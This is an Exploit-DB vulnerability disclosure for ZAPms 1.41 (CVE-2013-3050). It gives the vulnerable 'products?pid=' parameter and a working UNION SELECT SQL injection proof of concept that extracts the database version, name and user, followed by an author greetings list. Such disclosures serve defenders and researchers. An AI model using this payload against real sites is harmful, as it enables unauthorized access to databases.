ad

ZAPms 1.41- SQL Injection Vulnerability



EDB-ID: 24942 CVE: 2013-3050 OSVDB-ID: 92236
Author: NoGe Published: 2013-04-09 Verified: Verified
Exploit Code:   Download Vulnerable App:    Download

Rating

(0.0)
Prev Home Next
=============================================================================================================


  [o] ZAPms <= SQL Injection Vulnerability

       Software : ZAPms
       Version  : 1.41
       Vendor   : http://www.zapms.de
       Author   : NoGe
       Contact  : noge[dot]code[at]gmail[dot]com
       Desc     : ZAPms is free open source web content management system,
                  adapted to the needs of businesses on the Internet.
                  The ZAPms offers many features and modules as well as an expansion interface for maximum capabilities.


=============================================================================================================


  [o] Exploit

       http://localhost/[path]/products?pid=[SQLi]


=============================================================================================================


  [o] PoC

       http://server/products?pid=-14+union+select+1,2,3,4,5,6,7,8,9,version(),database(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,user(),43,44,45,46,47,48--&cid=0&tid=&page=&action=details&subaction=product


=============================================================================================================


  [o] Greetz

       Vrs-hCk OoN_BoY Paman zxvf s4va Angela Zhang stardustmemory
       aJe kaka11 matthews wishnusakti inc0mp13te martfella
       pizzyroot Genex H312Y noname tukulesto }^-^{


=============================================================================================================


  [o] April 09 2013 - Papua, Indonesia